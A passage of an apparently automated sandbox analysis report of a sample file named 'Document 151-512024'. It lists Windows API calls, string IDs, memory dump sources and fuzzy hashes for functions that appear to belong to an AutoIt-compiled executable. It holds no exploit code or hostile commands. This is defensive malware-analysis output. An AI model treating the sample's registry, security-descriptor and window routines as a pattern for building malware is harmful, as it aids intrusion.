                                                                                                    • DestroyWindow.USER32(?,?), ref: 00958E14
                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00996AC5
                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00996AFE
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00996F43
                                                                                                      • Part of subcall function 00958F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00958BE8,?,00000000,?,?,?,?,00958BBA,00000000,?), ref: 00958FC5
                                                                                                    • SendMessageW.USER32(?,00001053), ref: 00996F7F
                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00996F96
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00996FAC
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00996FB7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                    • String ID: 0$0n
                                                                                                    • API String ID: 2760611726-2816077665
                                                                                                    • Opcode ID: 014697ef3f79767226195a9f9a5da43e2d7dd23a45af7d3e4dd32ebf0a615b66
                                                                                                    • Instruction ID: bb46ca902688286af3aea985c8dad188379d0fc0a0539257cc48836fedf2b5ed
                                                                                                    • Opcode Fuzzy Hash: 014697ef3f79767226195a9f9a5da43e2d7dd23a45af7d3e4dd32ebf0a615b66
                                                                                                    • Instruction Fuzzy Hash: A712EE30205202DFDB25DF28D845BAAB7F9FB48301F148469F9999B261CB31EC96DB91
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(00000000), ref: 009C273E
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009C286A
                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009C28A9
                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009C28B9
                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 009C2900
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 009C290C
                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 009C2955
                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009C2964
                                                                                                    • GetStockObject.GDI32(00000011), ref: 009C2974
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 009C2978
                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 009C2988
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009C2991
                                                                                                    • DeleteDC.GDI32(00000000), ref: 009C299A
                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009C29C6
                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 009C29DD
                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 009C2A1D
                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 009C2A31
                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 009C2A42
                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 009C2A77
                                                                                                    • GetStockObject.GDI32(00000011), ref: 009C2A82
                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009C2A8D
                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 009C2A97
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                    • API String ID: 2910397461-517079104
                                                                                                    • Opcode ID: e0dc985ddc6bd263b5cd3e0e7e4ea97228aa7cf29289564bfd0404bf7c101c25
                                                                                                    • Instruction ID: aa507abb21efd45b13626a9864f35887ad767d4ba5ee447dbb2ba4bef6b9aa1e
                                                                                                    • Opcode Fuzzy Hash: e0dc985ddc6bd263b5cd3e0e7e4ea97228aa7cf29289564bfd0404bf7c101c25
                                                                                                    • Instruction Fuzzy Hash: A9B150B1A50215AFEB14DFA8DC85FAEBBB9EB48710F008519FA15EB290D774ED40CB50
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 009B4AED
                                                                                                    • GetDriveTypeW.KERNEL32(?,009DCB68,?,\\.\,009DCC08), ref: 009B4BCA
                                                                                                    • SetErrorMode.KERNEL32(00000000,009DCB68,?,\\.\,009DCC08), ref: 009B4D36
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                    • Opcode ID: 02b584e0cd944ce67a96880647b6ae03af2cbdfdb5efcb91b10761466aff0aab
                                                                                                    • Instruction ID: d6c114d52b4e56744d2c1e04e04cfded42d26009d15f8e6db3da288f5dc51958
                                                                                                    • Opcode Fuzzy Hash: 02b584e0cd944ce67a96880647b6ae03af2cbdfdb5efcb91b10761466aff0aab
                                                                                                    • Instruction Fuzzy Hash: 0361E63060510AABCB04DF24DB81EFD7BA4BB44B28B208815F846AB6D3DB35ED55FB41
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000012), ref: 009D7421
                                                                                                    • SetTextColor.GDI32(?,?), ref: 009D7425
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 009D743B
                                                                                                    • GetSysColor.USER32(0000000F), ref: 009D7446
                                                                                                    • CreateSolidBrush.GDI32(?), ref: 009D744B
                                                                                                    • GetSysColor.USER32(00000011), ref: 009D7463
                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 009D7471
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 009D7482
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 009D748B
                                                                                                    • SelectObject.GDI32(?,?), ref: 009D7498
                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 009D74B7
                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009D74CE
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009D74DB
                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009D752A
                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 009D7554
                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 009D7572
                                                                                                    • DrawFocusRect.USER32(?,?), ref: 009D757D
                                                                                                    • GetSysColor.USER32(00000011), ref: 009D758E
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 009D7596
                                                                                                    • DrawTextW.USER32(?,009D70F5,000000FF,?,00000000), ref: 009D75A8
                                                                                                    • SelectObject.GDI32(?,?), ref: 009D75BF
                                                                                                    • DeleteObject.GDI32(?), ref: 009D75CA
                                                                                                    • SelectObject.GDI32(?,?), ref: 009D75D0
                                                                                                    • DeleteObject.GDI32(?), ref: 009D75D5
                                                                                                    • SetTextColor.GDI32(?,?), ref: 009D75DB
                                                                                                    • SetBkColor.GDI32(?,?), ref: 009D75E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                    • String ID:
                                                                                                    • API String ID: 1996641542-0
                                                                                                    • Opcode ID: d2568183e0a9852aed2623e45038859976ee830981f75f741106953c65bbded8
                                                                                                    • Instruction ID: bc0b7b0e853f549f3dba22e6ebaa652cd4cc502a63ebcb9d88155039d1853287
                                                                                                    • Opcode Fuzzy Hash: d2568183e0a9852aed2623e45038859976ee830981f75f741106953c65bbded8
                                                                                                    • Instruction Fuzzy Hash: DE618472949219AFDF019FA4DC49EEEBF79EF08320F108116F915AB2A1D7749980DF90
                                                                                                    APIs
                                                                                                    • GetCursorPos.USER32(?), ref: 009D1128
                                                                                                    • GetDesktopWindow.USER32 ref: 009D113D
                                                                                                    • GetWindowRect.USER32(00000000), ref: 009D1144
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 009D1199
                                                                                                    • DestroyWindow.USER32(?), ref: 009D11B9
                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009D11ED
                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009D120B
                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009D121D
                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 009D1232
                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 009D1245
                                                                                                    • IsWindowVisible.USER32(00000000), ref: 009D12A1
                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009D12BC
                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009D12D0
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 009D12E8
                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 009D130E
                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 009D1328
                                                                                                    • CopyRect.USER32(?,?), ref: 009D133F
                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 009D13AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                    • API String ID: 698492251-4156429822
                                                                                                    • Opcode ID: e950b9a90c9ca1847d8983dba0a9d100434b808c7a45ec0fa5245c81272167b2
                                                                                                    • Instruction ID: 6109800494bd7325f10fb7891205840d3aa3d9d6e6bc432a74a766c995ae7f1b
                                                                                                    • Opcode Fuzzy Hash: e950b9a90c9ca1847d8983dba0a9d100434b808c7a45ec0fa5245c81272167b2
                                                                                                    • Instruction Fuzzy Hash: E7B16C72648341AFD714DF64C885B6BFBE8FF88350F00891AF9999B2A1C771E845CB91
                                                                                                    APIs
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 009D02E5
                                                                                                    • _wcslen.LIBCMT ref: 009D031F
                                                                                                    • _wcslen.LIBCMT ref: 009D0389
                                                                                                    • _wcslen.LIBCMT ref: 009D03F1
                                                                                                    • _wcslen.LIBCMT ref: 009D0475
                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009D04C5
                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009D0504
                                                                                                      • Part of subcall function 0095F9F2: _wcslen.LIBCMT ref: 0095F9FD
                                                                                                      • Part of subcall function 009A223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009A2258
                                                                                                      • Part of subcall function 009A223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009A228A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                    • API String ID: 1103490817-719923060
                                                                                                    • Opcode ID: 7320612fa7da69b448321a35acf44b862880cbe2b1a5f64c51e1cfa33843a552
                                                                                                    • Instruction ID: 06d0174e43ecc64a3c4c59be8fb855f935cafdb7056ef558f9dca89cc6809897
                                                                                                    • Opcode Fuzzy Hash: 7320612fa7da69b448321a35acf44b862880cbe2b1a5f64c51e1cfa33843a552
                                                                                                    • Instruction Fuzzy Hash: 75E1AD316482018FC714DF28C551A2EB3E6BFC8714F548A6EF8969B3A1DB30ED45CB91
                                                                                                    APIs
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00958968
                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00958970
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0095899B
                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 009589A3
                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 009589C8
                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 009589E5
                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009589F5
                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00958A28
                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00958A3C
                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00958A5A
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00958A76
                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00958A81
                                                                                                      • Part of subcall function 0095912D: GetCursorPos.USER32(?), ref: 00959141
                                                                                                      • Part of subcall function 0095912D: ScreenToClient.USER32(00000000,?), ref: 0095915E
                                                                                                      • Part of subcall function 0095912D: GetAsyncKeyState.USER32(00000001), ref: 00959183
                                                                                                      • Part of subcall function 0095912D: GetAsyncKeyState.USER32(00000002), ref: 0095919D
                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,009590FC), ref: 00958AA8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                    • API String ID: 1458621304-248962490
                                                                                                    • Opcode ID: 1aec14e53d49c7489758e308b5ce69bd01dd363fbd50c7bcdb579a8fc796082a
                                                                                                    • Instruction ID: 0e9ff73ddfed5fc0785e61f866c2c4fcf4241471a143c64b91fd437d34324f59
                                                                                                    • Opcode Fuzzy Hash: 1aec14e53d49c7489758e308b5ce69bd01dd363fbd50c7bcdb579a8fc796082a
                                                                                                    • Instruction Fuzzy Hash: 62B18C71A0420AAFDF14DFA9DC55BEE3BB5FB48315F10822AFA15A7290DB34E841CB50
                                                                                                    APIs
                                                                                                      • Part of subcall function 009A10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009A1114
                                                                                                      • Part of subcall function 009A10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A1120
                                                                                                      • Part of subcall function 009A10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A112F
                                                                                                      • Part of subcall function 009A10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A1136
                                                                                                      • Part of subcall function 009A10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009A114D
                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009A0DF5
                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009A0E29
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 009A0E40
                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 009A0E7A
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009A0E96
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 009A0EAD
                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 009A0EB5
                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 009A0EBC
                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009A0EDD
                                                                                                    • CopySid.ADVAPI32(00000000), ref: 009A0EE4
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009A0F13
                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009A0F35
                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009A0F47
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0F6E
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 009A0F75
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0F7E
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 009A0F85
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0F8E
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 009A0F95
                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 009A0FA1
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 009A0FA8
                                                                                                      • Part of subcall function 009A1193: GetProcessHeap.KERNEL32(00000008,009A0BB1,?,00000000,?,009A0BB1,?), ref: 009A11A1
                                                                                                      • Part of subcall function 009A1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,009A0BB1,?), ref: 009A11A8
                                                                                                      • Part of subcall function 009A1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009A0BB1,?), ref: 009A11B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 4175595110-0
                                                                                                    • Opcode ID: 74e99c4fa54aad841e28512a73e5021788c49e06d5a10b29927081b331867640
                                                                                                    • Instruction ID: 8151a45a5040e436768ab58ff6d81985023c3967605f1755e3b5dbad5d200f7e
                                                                                                    • Opcode Fuzzy Hash: 74e99c4fa54aad841e28512a73e5021788c49e06d5a10b29927081b331867640
                                                                                                    • Instruction Fuzzy Hash: D9717CB290521AEFDF209FA4DC44FAEBBBCBF45301F144116F919B6191D730A945DBA0
                                                                                                    APIs
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009CC4BD
                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,009DCC08,00000000,?,00000000,?,?), ref: 009CC544
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 009CC5A4
                                                                                                    • _wcslen.LIBCMT ref: 009CC5F4
                                                                                                    • _wcslen.LIBCMT ref: 009CC66F
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 009CC6B2
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 009CC7C1
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 009CC84D
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 009CC881
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 009CC88E
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 009CC960
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                    • API String ID: 9721498-966354055
                                                                                                    • Opcode ID: f6e3a27dbedc56c558e96e80a362d2332c5a02a696928b4ad6ac6970662ae7fa
                                                                                                    • Instruction ID: fe962da6fd6776bf9a7ee220995ea47d8cd8802878488a11e01701aa3cb2ae18
                                                                                                    • Opcode Fuzzy Hash: f6e3a27dbedc56c558e96e80a362d2332c5a02a696928b4ad6ac6970662ae7fa
                                                                                                    • Instruction Fuzzy Hash: 87124975A042119FDB14DF14C891F2ABBE5EF88714F14889DF84A9B3A2DB31ED45CB82
                                                                                                    APIs
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 009D09C6
                                                                                                    • _wcslen.LIBCMT ref: 009D0A01
                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009D0A54
                                                                                                    • _wcslen.LIBCMT ref: 009D0A8A
                                                                                                    • _wcslen.LIBCMT ref: 009D0B06
                                                                                                    • _wcslen.LIBCMT ref: 009D0B81
                                                                                                      • Part of subcall function 0095F9F2: _wcslen.LIBCMT ref: 0095F9FD
                                                                                                      • Part of subcall function 009A2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009A2BFA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
